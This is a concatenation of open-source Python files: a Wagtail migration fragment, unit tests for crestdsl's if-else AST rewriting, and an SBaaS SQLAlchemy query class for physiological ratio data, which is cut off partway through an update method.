('event_page', '0004_auto_20200928_1854'),
]
operations = [
migrations.AlterField(
model_name='eventpage',
name='description',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_ar',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_en',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_es',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_vi',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
]
781a3ff955e6e597c5b2a60eb8177fa8839231dc | 4,857 | py | Python | tests/simulator/test_rewrite_if.py | stklik/CREST | 7fd97c50b0c6c923e1c477105bed4f0ea032bb99 | ["MIT"] | 14 | 2019-08-06T10:17:46.000Z | 2022-03-13T12:50:59.000Z
import unittest
import ast
from crestdsl import sourcehelper as SH
from crestdsl.simulation.to_z3 import *
import logging
logging.basicConfig(level=logging.INFO) # basic logging level
class TestRewriteIf(unittest.TestCase):
def test_rewrite_single_if_copy_following_to_both_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
y = 50
else:
y = 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
# assert that y += 3 and return have been copied to then and to else
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 3, "then-branch has correct number of statements"
assert len(orelse) == 3, "else-branch has correct number of statements"
assert isinstance(then[1], ast.AugAssign), "AugAssign has not been copied to then-branch"
assert isinstance(orelse[1], ast.AugAssign), "AugAssign has not been copied to else-branch"
assert isinstance(then[2], ast.Return), "Return has not been copied to then-branch"
assert isinstance(orelse[2], ast.Return), "Return has not been copied to else-branch"
def test_rewrite_single_if_copy_following_to_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
y = 50
else:
return 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 3, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert isinstance(then[1], ast.AugAssign), "AugAssign has not been copied to then-branch"
assert isinstance(then[2], ast.Return), "Return has not been copied to then-branch"
assert isinstance(orelse[0], ast.Return), "else-branch statement is a return (just as the original)"
def test_rewrite_nested_if_copy_following_to_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
if y < 50:
y = 50
else:
y -= 15
else:
if y < 50:
y = 44
else:
y -= 15
return y + 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 1, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert len(then[0].body) == 3, "then-then-branch has correct number of statements"
assert len(then[0].orelse) == 3, "then-else-branch has correct number of statements"
assert len(orelse[0].body) == 3, "else-then-branch has correct number of statements"
assert len(orelse[0].orelse) == 2, "else-else-branch has correct number of statements"
def test_rewrite_nested_if_copy_subpart_following_to_nested_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
if y < 50:
y = 50
else:
y -= 15
x += 22
return x
else:
if y < 50:
y = 44
return y
else:
y -= 15
return y + 100.5
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 1, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert len(then[0].body) == 3, "then-then-branch has correct number of statements"
assert len(then[0].orelse) == 3, "then-else-branch has correct number of statements"
assert len(orelse[0].body) == 2, "else-then-branch has correct number of statements"
assert len(orelse[0].orelse) == 2, "else-else-branch has correct number of statements"
if __name__ == '__main__':
unittest.main()
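The transformation these tests verify — statements following an `if/else` are copied into both branches — can be sketched with the stdlib `ast` module. This is an illustrative reimplementation under my own simplifying assumptions (only the first top-level `if` is handled), not crestdsl's `SH.RewriteIfElse`:

```python
import ast
import copy

SRC = """
def update():
    y = 1
    if y < 2:
        y = 50
    else:
        y = 100
    y += 3
    return y * 4
"""

def push_tail_into_branches(fn):
    # Find the first top-level If and move every statement after it into
    # both branches (deep copies, so the branches share no AST nodes).
    for i, stmt in enumerate(fn.body):
        if isinstance(stmt, ast.If):
            tail = fn.body[i + 1:]
            stmt.body.extend(copy.deepcopy(tail))
            stmt.orelse.extend(copy.deepcopy(tail))
            fn.body = fn.body[:i + 1]
            break
    return fn

tree = ast.parse(SRC)
fn = push_tail_into_branches(tree.body[0])
ifnode = fn.body[1]   # both branches now end with the AugAssign and Return
ast.fix_missing_locations(tree)
ns = {}
exec(compile(tree, "<rewritten>", "exec"), ns)
result = ns["update"]()   # y = 50; y += 3; return 53 * 4 -> 212
```

The rewritten function still computes the same value, which is why the tests above only need to check branch structure, not behavior.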
786cd8372dd9912051aaf53ad3b8f454c114b3db | 30,896 | py | Python | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | ["MIT"]
#lims
from SBaaS_LIMS.lims_experiment_postgresql_models import *
from SBaaS_LIMS.lims_sample_postgresql_models import *
from .stage01_quantification_physiologicalRatios_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_physiologicalRatios_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_quantification_physiologicalRatios_averages':data_stage01_quantification_physiologicalRatios_averages,
'data_stage01_quantification_physiologicalRatios_replicates':data_stage01_quantification_physiologicalRatios_replicates,
};
self.set_supportedTables(tables_supported);
# Query sample names from data_stage01_quantification_physiologicalRatios_replicates
def get_sampleNameAbbreviations_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,exp_type_I=4):
'''Query sample names (i.e. unknowns) that are used in the experiment'''
try:
sample_names = self.session.query(sample_description.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
sample_description.sample_name_abbreviation).order_by(
sample_description.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
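For readers less familiar with SQLAlchemy, the filter/group_by/order_by chain above corresponds roughly to plain SQL like the following. This standalone sketch uses a made-up in-memory table via the stdlib sqlite3 rather than the project's PostgreSQL models:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE replicates (
    experiment_id TEXT, sample_name_abbreviation TEXT,
    physiologicalratio_value REAL, used_ INTEGER);
INSERT INTO replicates VALUES
    ('exp01', 'strain_A', 0.5, 1),
    ('exp01', 'strain_A', 0.7, 1),
    ('exp01', 'strain_B', 0.6, 1),
    ('exp01', 'strain_C', 0.4, 0);   -- used_ is false: excluded by the filter
""")
# Roughly the SQL the ORM chain emits: LIKE match on the experiment id,
# used_ flag check, then distinct abbreviations in ascending order.
names = [row[0] for row in conn.execute("""
    SELECT sample_name_abbreviation FROM replicates
    WHERE experiment_id LIKE ? AND used_ = 1
    GROUP BY sample_name_abbreviation
    ORDER BY sample_name_abbreviation ASC
""", ("exp01",))]
# names == ['strain_A', 'strain_B']
```

`GROUP BY` with no aggregate acts as `DISTINCT` here, which matches how the ORM methods deduplicate sample names.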
def get_sampleNameShort_experimentIDAndSampleNameAbbreviationAndRatioIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,physiologicalratio_id_I,time_point_I,exp_type_I=4):
'''Query sample names used in the experiment, filtered by sample name abbreviation, ratio id, and time point'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).order_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.asc()).all();
sample_names_short_O = [];
for sn in sample_names: sample_names_short_O.append(sn.sample_name_short);
return sample_names_short_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_replicates
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,exp_type_I=4):
'''Query time points that are used in the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
sample_description.sample_name_short.like(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short),
sample_description.time_point.like(data_stage01_quantification_physiologicalRatios_replicates.time_point),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Query time points that are used in the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndRatioID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,physiologicalratio_id_I):
'''Query time points that are used in the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_replicates
def get_ratio_experimentIDAndSampleNameShortAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I, physiologicalratio_id_I):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
ratio_O = data[0][0];
else:
ratio_O = None;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def get_ratios_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).all();
ratios_O = [];
for d in data:
ratios_O.append(d[0]);
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameShortAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
# Query ratio_id information from data_stage01_quantificaton_physiologicalRatios_replicates
def get_ratioIDs_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,time_point_I):
'''Query physiologicalRatio_ids that are used from the experiment by time_point'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_ratioIDs_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Query physiologicalRatio_ids that are used from the experiment'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_averages
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I):
'''Query time points that are used in the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_averages.time_point).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.time_point).order_by(
data_stage01_quantification_physiologicalRatios_averages.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query sample names from data_stage01_quantification_physiologicalRatios_averages
def get_sampleNameAbbreviations_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I):
'''Query sample names (i.e. unknowns) that are used in the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndTimePointAndRatioID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I,physiologicalratio_id_I):
'''Query sample names (i.e. unknowns) that are used in the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_averages:
def get_data_experimentIDAndTimePointAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = [];
for d in data:
data_1 = {'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value_ave':d.physiologicalratio_value_ave,
'physiologicalratio_value_cv':d.physiologicalratio_value_cv,
'physiologicalratio_value_lb':d.physiologicalratio_value_lb,
'physiologicalratio_value_ub':d.physiologicalratio_value_ub,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_};
data_O.append(data_1);
return data_O;
except SQLAlchemyError as e:
print(e);
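The averages table carries `_ave`, `_cv`, `_lb`, and `_ub` columns per ratio. One plausible derivation of those columns from replicate values is sketched below — this is an assumption about the convention (percent CV, 95% normal-approximation interval), not the actual SBaaS computation:

```python
import math
import statistics

def summarize_ratios(values):
    """Hypothetical sketch: mean, percent CV, and 95% confidence bounds
    for a list of replicate ratio values. The real SBaaS convention
    may differ (e.g. different interval width or CV scaling)."""
    ave = statistics.mean(values)
    stdev = statistics.stdev(values)
    cv = stdev / ave * 100.0                      # coefficient of variation, %
    half = 1.96 * stdev / math.sqrt(len(values))  # normal-approximation half-width
    return {"physiologicalratio_value_ave": ave,
            "physiologicalratio_value_cv": cv,
            "physiologicalratio_value_lb": ave - half,
            "physiologicalratio_value_ub": ave + half}

summary = summarize_ratios([0.95, 1.00, 1.05])
```

A summary like this would populate one row of `data_stage01_quantification_physiologicalRatios_averages` per sample name abbreviation, time point, and ratio id.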
def get_data_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = {};
if data:
data_O = {'experiment_id':data[0].experiment_id,
'sample_name_abbreviation':data[0].sample_name_abbreviation,
'time_point':data[0].time_point,
'physiologicalratio_id':data[0].physiologicalratio_id,
'physiologicalratio_name':data[0].physiologicalratio_name,
'physiologicalratio_value_ave':data[0].physiologicalratio_value_ave,
'physiologicalratio_value_cv':data[0].physiologicalratio_value_cv,
'physiologicalratio_value_lb':data[0].physiologicalratio_value_lb,
'physiologicalratio_value_ub':data[0].physiologicalratio_value_ub,
'physiologicalratio_description':data[0].physiologicalratio_description,
'used_':data[0].used_,
'comment_':data[0].comment_};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_ratio_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I, time_point_I, physiologicalratio_id_I, sample_name_abbreviation_I):
    """get the average physiological-ratio value matching the experiment ID, time point, ratio ID, and sample name abbreviation"""
    try:
        data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
            data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
            data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
            data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
            data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
            data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all()
        ratio_O = None
        if data:
            ratio_O = data[0].physiologicalratio_value_ave
        return ratio_O
    except SQLAlchemyError as e:
        print(e)
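The query pattern used by the getters above (text columns filtered with `.like()`, the boolean `used_` flag checked with `.is_(True)`, then the first matching row read) can be sketched against a minimal stand-in model. The model, table, and sample values below are hypothetical, not the project's actual schema, and assume SQLAlchemy 1.4+:

```python
# Minimal sketch of the filter-and-read-first-row pattern, assuming SQLAlchemy 1.4+.
# RatioAverage and its columns are illustrative stand-ins, not the project's models.
from sqlalchemy import Boolean, Column, Float, Integer, String, create_engine
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class RatioAverage(Base):
    __tablename__ = 'ratio_averages'  # hypothetical table
    id = Column(Integer, primary_key=True)
    experiment_id = Column(String)
    physiologicalratio_value_ave = Column(Float)
    used_ = Column(Boolean)

engine = create_engine('sqlite:///:memory:')
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.add_all([
        RatioAverage(experiment_id='exp01', physiologicalratio_value_ave=1.5, used_=True),
        RatioAverage(experiment_id='exp01', physiologicalratio_value_ave=9.9, used_=False),
    ])
    session.commit()
    # .like() with no wildcards behaves as an equality match;
    # .is_(True) keeps only rows flagged as used.
    rows = session.query(RatioAverage).filter(
        RatioAverage.experiment_id.like('exp01'),
        RatioAverage.used_.is_(True)).all()
    ratio = rows[0].physiologicalratio_value_ave if rows else None
```

Returning `None` when no row matches mirrors `get_ratio_...`'s `ratio_O = None` default.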
def drop_dataStage01_quantification_physiologicalRatios(self):
    try:
        data_stage01_quantification_physiologicalRatios_replicates.__table__.drop(self.engine, checkfirst=True)
        data_stage01_quantification_physiologicalRatios_averages.__table__.drop(self.engine, checkfirst=True)
    except SQLAlchemyError as e:
        print(e)
def initialize_dataStage01_quantification_physiologicalRatios(self):
    try:
        data_stage01_quantification_physiologicalRatios_replicates.__table__.create(self.engine, checkfirst=True)
        data_stage01_quantification_physiologicalRatios_averages.__table__.create(self.engine, checkfirst=True)
    except SQLAlchemyError as e:
        print(e)
def reset_dataStage01_quantification_physiologicalRatios(self, experiment_id_I):
    try:
        if experiment_id_I:
            reset = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I)).delete(synchronize_session=False)
            reset = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False)
        self.session.commit()
    except SQLAlchemyError as e:
        print(e)
def add_dataStage01QuantificationPhysiologicalRatiosReplicates(self, data_I):
    '''add rows of data_stage01_quantification_physiologicalRatios_replicates'''
    if data_I:
        for d in data_I:
            try:
                # each d is a row dict of column values for the replicates table
                data_add = data_stage01_quantification_physiologicalRatios_replicates(d)
                self.session.add(data_add)
            except SQLAlchemyError as e:
                print(e)
        self.session.commit()
def update_dataStage01QuantificationPhysiologicalRatiosReplicates(self, data_I):
    '''update rows of data_stage01_quantification_physiologicalRatios_replicates'''
    if data_I:
        for d in data_I:
            try:
                data_update = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
                    data_stage01_quantification_physiologicalRatios_replicates.id == d['id']).update(
                    {'experiment_id': d['experiment_id'],
                     'sample_name_short': d['sample_name_short'],
                     'time_point': d['time_point'],
                     'physiologicalratio_id': d['physiologicalratio_id'],
                     'physiologicalratio_name': d['physiologicalratio_name'],
                     'physiologicalratio_value': d['physiologicalratio_value'],
                     'physiologicalratio_description': d['physiologicalratio_description'],
                     'used_': d['used_'],
                     'comment_': d['comment_']},
                    synchronize_session=False)
